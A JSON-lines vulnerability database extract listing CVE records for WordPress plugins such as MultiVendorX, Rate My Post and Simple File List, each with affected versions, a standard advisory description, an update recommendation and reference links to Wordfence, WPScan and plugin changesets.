{"CVE_ID":"CVE-2024-12309","slug":"rate-my-post","versionImpact":"4.2.4","versionEndExcluding":"4.2.5","description":"The Rate My Post \u2013 Star Rating Plugin by FeedbackWP plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.4 via the get_post_status() due to missing validation on a user controlled key. This makes it possible for unauthenticated attackers to vote on unpublished scheduled posts.","recommendation":"Update to version 4.2.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206801\\\/rate-my-post\\\/trunk\\\/public\\\/class-rate-my-post-public.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3206801\\\/rate-my-post\\\/trunk\\\/public\\\/class-rate-my-post-public.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c9aa467f-9ac2-4a84-b0bb-761101733af7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4199","slug":"ithemeland-bulk-posts-editing-lite","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to unauthorized access of functionality due to a missing capability check on the plugin's AJAX actions in all versions up to, and including, 4.2.3. This makes it possible for authenticated attackers, with subscriber access and higher, to invoke their corresponding functions. This may lead to post creation and duplication, post content retrieval, post taxonomy manipulation.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/683131a0-eec3-4251-b322-5c2088855687?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/683131a0-eec3-4251-b322-5c2088855687?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4204","slug":"ithemeland-bulk-posts-editing-lite","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The Bulk Posts Editing For WordPress plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 4.2.3. This is due to missing or incorrect nonce validation on the plugin's AJAX actions.. This makes it possible for unauthenticated attackers to create and duplicate posts, retrieve post content, and modify post taxonomy among other things via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b39462-32c5-4f7d-b54f-d95f40b6ed92?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/34b39462-32c5-4f7d-b54f-d95f40b6ed92?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3085134%40ithemeland-bulk-posts-editing-lite%2Ftrunk&old=2946926%40ithemeland-bulk-posts-editing-lite%2Ftrunk&sfp_email=&sfph_mail=#file51\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5861","slug":"wp-easy-pay","versionImpact":"4.2.3","versionEndExcluding":"4.2.4","description":"The WP EasyPay \u2013 Square for WordPress plugin for WordPress is vulnerable to unauthorized modification of datadue to a missing capability check on the wpep_square_disconnect() function in all versions up to, and including, 4.2.3. This makes it possible for unauthenticated attackers to disconnect square.","recommendation":"Update to version 4.2.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/446d458e-8b42-434e-a190-0af37a7d3afb?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/446d458e-8b42-434e-a190-0af37a7d3afb?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/modules\\\/payments\\\/square-authorization.php#L199\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-easy-pay\\\/trunk\\\/modules\\\/payments\\\/square-authorization.php#L199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3106655%40wp-easy-pay&new=3106655%40wp-easy-pay&sfp_email=&sfph_mail=#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3106655%40wp-easy-pay&new=3106655%40wp-easy-pay&sfp_email=&sfph_mail=#file1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122946%40wp-easy-pay&new=3122946%40wp-easy-pay&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3122946%40wp-easy-pay&new=3122946%40wp-easy-pay&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6000","slug":"popup-builder","versionEndExcluding":"4.2.3","description":"The Popup Builder WordPress plugin before 4.2.3 does not prevent simple visitors from updating existing popups, and injecting raw JavaScript in them, which could lead to Stored XSS attacks.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/cdb3a8bd-4ee0-4ce0-9029-0490273bcfc8\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-popup-builder-4-2-3\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/blog\\\/stored-xss-fixed-in-popup-builder-4-2-3\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36847","slug":"simple-file-list","versionEndExcluding":"4.2.3","description":"The Simple-File-List Plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 4.2.2 via the rename function which can be used to rename uploaded PHP code with a png extension to use a php extension. This allows unauthenticated attackers to execute code on the server.","recommendation":"Update to version 4.2.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/160221\\\/\",\"name\":\"https:\\\/\\\/packetstormsecurity.com\\\/files\\\/160221\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2286920\\\/simple-file-list\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365da9c5-a8d0-45f6-863c-1b1926ffd574\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/365da9c5-a8d0-45f6-863c-1b1926ffd574\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"name\":\"https:\\\/\\\/www.cybersecurity-help.cz\\\/vdb\\\/SB2020042711\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eb835fd-6ebf-4162-856c-0366b663a07e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/9eb835fd-6ebf-4162-856c-0366b663a07e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-4101","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.22","versionEndExcluding":"4.2.23","description":"The MultiVendorX \u2013 WooCommerce Multivendor Marketplace Solutions plugin for WordPress is vulnerable to unauthorized loss of data due to a misconfigured capability check on the 'delete_fpm_product' function in all versions up to, and including, 4.2.22. This makes it possible for authenticated attackers, with Contributor-level access and above, to delete arbitrary posts, pages, attachments, and products. The vulnerability was partially patched in version 4.2.22.","recommendation":"Update to version 4.2.23, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L982\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php#L982\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293832\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?old=3272848&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3293832\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/classes\\\/class-mvx-ajax.php?old=3272848&old_path=dc-woocommerce-multi-vendor%2Ftrunk%2Fclasses%2Fclass-mvx-ajax.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1fd517-32ee-429d-9026-512afe117dc5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5c1fd517-32ee-429d-9026-512afe117dc5?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2789","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.19","versionEndExcluding":"4.2.20","description":"The MultiVendorX \u2013 Empower Your WooCommerce Store with a Dynamic Multivendor Marketplace \u2013 Build the Next Amazon, eBay, Etsy plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the delete_table_rate_shipping_row function in all versions up to, and including, 4.2.19. This makes it possible for unauthenticated attackers to delete Table Rates that can impact the shipping cost calculations.","recommendation":"Update to version 4.2.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L211\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L211\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L78\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.19\\\/packages\\\/mvx-tablerate\\\/mvx-tablerate.php#L78\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf4eca37-066f-428c-a4f7-061ce06e1142?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bf4eca37-066f-428c-a4f7-061ce06e1142?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3281","slug":"user-registration","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The User Registration & Membership \u2013 Custom Registration Form, Login Form, and User Profile plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 4.2.1 via the create_stripe_subscription() function, due to missing validation on the 'member_id' user controlled key. This makes it possible for unauthenticated attackers to delete arbitrary user accounts that have registered through the plugin.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/modules\\\/membership\\\/includes\\\/AJAX.php#L619\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/user-registration\\\/tags\\\/4.1.3\\\/modules\\\/membership\\\/includes\\\/AJAX.php#L619\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287698\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3287698\\\/user-registration\\\/trunk\\\/modules\\\/membership\\\/includes\\\/AJAX.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30339ff6-b6bf-4c56-b6cd-db0b8a6ce8b6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/30339ff6-b6bf-4c56-b6cd-db0b8a6ce8b6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11809","slug":"primer-mydata","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Primer MyData for Woocommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'img_src' parameter in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3205727%40primer-mydata%2Ftrunk&old=3188823%40primer-mydata%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3205727%40primer-mydata%2Ftrunk&old=3188823%40primer-mydata%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca092cf-9482-468e-8dd4-af04e25bcf33?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/aca092cf-9482-468e-8dd4-af04e25bcf33?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4630","slug":"astra-sites","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Starter Templates \u2014 Elementor, WordPress & Beaver Builder Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018custom_upload_mimes\u2019 function in versions up to, and including, 4.2.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25edb9e8-65ea-41d1-a95f-09be110ec1d2?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/25edb9e8-65ea-41d1-a95f-09be110ec1d2?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/astra-sites\\\/tags\\\/4.2.0\\\/inc\\\/importers\\\/wxr-importer\\\/class-astra-wxr-importer.php#L416\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/astra-sites\\\/tags\\\/4.2.0\\\/inc\\\/importers\\\/wxr-importer\\\/class-astra-wxr-importer.php#L416\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084334\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3084334\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10437","slug":"wpc-smart-messages","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The WPC Smart Messages for WooCommerce plugin for WordPress is vulnerable to unauthorized Smar Message activation\/deactivation due to a missing capability check on the ajax_enable function in all versions up to, and including, 4.2.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate or deactivate smart messages.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4acb4fda-0217-44b9-a85e-64807eb4a011?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L775\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wpc-smart-messages\\\/tags\\\/4.2.1\\\/includes\\\/class-backend.php#L775\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3177426\\\/wpc-smart-messages\\\/trunk\\\/includes\\\/class-backend.php?contextall=1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10891","slug":"save-as-pdf-by-pdfcrowd","versionImpact":"4.2.1","versionEndExcluding":"4.2.2","description":"The Save as PDF Plugin by Pdfcrowd plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'save_as_pdf_pdfcrowd' shortcode in all versions up to, and including, 4.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 4.2.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3763d893-83a0-4b6a-9c21-34a69313d555?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3763d893-83a0-4b6a-9c21-34a69313d555?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/save-as-pdf-by-pdfcrowd\\\/trunk\\\/public\\\/class-save-as-pdf-pdfcrowd-public.php#L586\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/save-as-pdf-by-pdfcrowd\\\/trunk\\\/public\\\/class-save-as-pdf-pdfcrowd-public.php#L586\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2189","slug":"social-icons-widget-by-wpzoom","versionImpact":"4.2.17","versionEndExcluding":"4.2.18","description":"The Social Icons Widget & Block by WPZOOM WordPress plugin before 4.2.18 does not sanitise and escape some of its Widget settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 4.2.18, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8661fbe-78b9-4d29-90bf-5b68af468eb6\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b8661fbe-78b9-4d29-90bf-5b68af468eb6\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-0493","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.14","versionEndExcluding":"4.2.15","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to Limited  Local File Inclusion in all versions up to, and including, 4.2.14 via the tabname parameter. This makes it possible for unauthenticated attackers to include PHP files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where PHP files can be uploaded and included","recommendation":"Update to version 4.2.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.14\\\/classes\\\/class-mvx-ajax.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.14\\\/classes\\\/class-mvx-ajax.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.15\\\/classes\\\/class-mvx-ajax.php#L661\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.15\\\/classes\\\/class-mvx-ajax.php#L661\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812029d9-95d6-4bc9-98b2-700f462163b3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/812029d9-95d6-4bc9-98b2-700f462163b3?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13489","slug":"ltl-freight-quotes-odfl-edition","versionImpact":"4.2.10","versionEndExcluding":"4.2.11","description":"The LTL Freight Quotes \u2013 Old Dominion Edition plugin for WordPress is vulnerable to SQL Injection via the 'edit_id' and 'dropship_edit_id' parameters in all versions up to, and including, 4.2.10 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query.  This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 4.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242160%40ltl-freight-quotes-odfl-edition&new=3242160%40ltl-freight-quotes-odfl-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3242160%40ltl-freight-quotes-odfl-edition&new=3242160%40ltl-freight-quotes-odfl-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7d63fc-288b-4f2f-85cd-e94add07a536?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3c7d63fc-288b-4f2f-85cd-e94add07a536?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-11282","slug":"content-protector","versionImpact":"4.2.10","versionEndExcluding":"4.2.11","description":"The Passster \u2013 Password Protect Pages and Content plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 4.2.10 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as administrator.","recommendation":"Update to version 4.2.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211004\\\/content-protector\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3211004\\\/content-protector\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11782a65-30b9-400e-8fe0-ab9f05ba5e42?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/11782a65-30b9-400e-8fe0-ab9f05ba5e42?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8289","slug":"dc-woocommerce-multi-vendor","versionImpact":"4.2.0","versionEndExcluding":"4.2.1","description":"The MultiVendorX \u2013 The Ultimate WooCommerce Multivendor Marketplace Solution plugin for WordPress is vulnerable to privilege escalation\/de-escalation and account takeover due to an insufficient capability check on the update_item_permissions_check and create_item_permissions_check functions in all versions up to, and including, 4.2.0. This makes it possible for unauthenticated attackers to change the password of any user with the vendor role, create new users with the vendor role, and demote other users like administrators to the vendor role.","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85fbaff-d566-4ed2-8943-c174e0c4d2d8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a85fbaff-d566-4ed2-8943-c174e0c4d2d8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L705\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L705\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L641\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L641\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L382\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/tags\\\/4.2.0\\\/api\\\/class-mvx-rest-vendors-controller.php#L382\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-vendors-controller.php?rev=3145638\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/dc-woocommerce-multi-vendor\\\/trunk\\\/api\\\/class-mvx-rest-vendors-controller.php?rev=3145638\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3476","slug":"side-menu-lite","versionImpact":"4.2","versionEndExcluding":"4.2.1","description":"The Side Menu Lite  WordPress plugin before 4.2.1 does not have CSRF checks in some bulk actions, which could allow attackers to make logged in admins perform unwanted actions, such as deleting buttons via CSRF attacks","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46f74493-9082-48b2-90bc-2c1d1db64ccd\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/46f74493-9082-48b2-90bc-2c1d1db64ccd\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13730","slug":"podlove-podcasting-plugin-for-wordpress","versionImpact":"4.2.0","versionEndExcluding":"4.2.1","description":"The Podlove Podcast Publisher WordPress plugin before 4.2.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).","recommendation":"Update to version 4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4541a285-a095-4178-a64b-6a859eb5034e\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/4541a285-a095-4178-a64b-6a859eb5034e\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
